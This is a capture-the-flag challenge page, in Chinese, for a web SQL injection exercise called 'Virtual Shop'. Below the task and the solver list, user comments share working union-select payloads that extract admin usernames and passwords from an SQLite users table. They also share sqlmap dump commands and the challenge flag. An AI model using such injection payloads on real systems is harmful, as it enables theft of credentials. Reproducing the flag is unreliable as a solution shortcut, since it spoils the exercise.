Virtual ShopWEB 未解决
分数:
0
金币:
0
题目作者:
未知
一 血:
heyile
一血奖励:
0金币
解 决:
418
提 示:
描 述:
So, let's see if you can retrieve the `password` of the admin which\
\ `username` is 'admin' among all the available `users` in the db\n\n\n **Author**:\
\ F100w"
评分(0)
暂无评分
解题动态
路痴通 攻破了该题 3天前
un 攻破了该题 9天前
理塘王丁真 攻破了该题 9天前
谢鹤羽 攻破了该题 10天前
何何 攻破了该题 12天前
shikeerzhi 攻破了该题 14天前
admin10086 攻破了该题 17天前
司徒草青 攻破了该题 17天前
dyh1213 攻破了该题 21天前
李逍遥逛霍格沃茨 攻破了该题 22天前
zhouxin1288 攻破了该题 24天前
飞行雪融 攻破了该题 24天前
chrisslyy 攻破了该题 1月前
854396873 攻破了该题 1月前
意料之中是戏 攻破了该题 1月前
wywitkey 攻破了该题 1月前
david666 攻破了该题 1月前
zhatao 攻破了该题 1月前
jiubanyipeng 攻破了该题 1月前
评论
tdwj 6月前
举报
一开始' union select 1,2,database(),4--+报错,看提示' union select 1,2,username,password from users--+倒是可出flag
欧尼酱001 1年前
举报
1、将请求包保存为1.txt 2、python3 sqlmap.py -r 1.txt --batch --tables 3、python3 sqlmap.py -r 1.txt --batch -T users --dump 即可跑出表字段:shellmates{Gg_b0Y_you_kNOW_w3ll_H0w_T0_uSe_uNiOn_4tTacK}
WCRH 1年前
举报
这又不是post请求,你还保存上txt了
.⎛⎝•̀ω•́⎠⎞. 2年前
举报
只用sqlmap就可以做出来,很简单的一个注入
FADogeCTF 2年前
举报
union查询
xiaobai568 2年前
举报
前面的太复杂了吧,-1'union select (select password from users where username='admin'),5,3,4 -- 直接就出来了
JJhello 2年前
举报
sqlmap即可
chaoge 2年前
举报
sqlite,弄了半天认为是MySQL呢。
justsosoloveyou 2年前
举报
' UNION SELECT (select group_concat(sql) from sqlite_master WHERE type='table'),NULL,NULL,(select group_concat(username||':'||password) FROM users)--+
SS3B 2年前
举报
sqlmap一下子就出来了
hopeinhand 2年前
举报
联合查询注入,表名、列名、用户名全给了,都没啥好说的了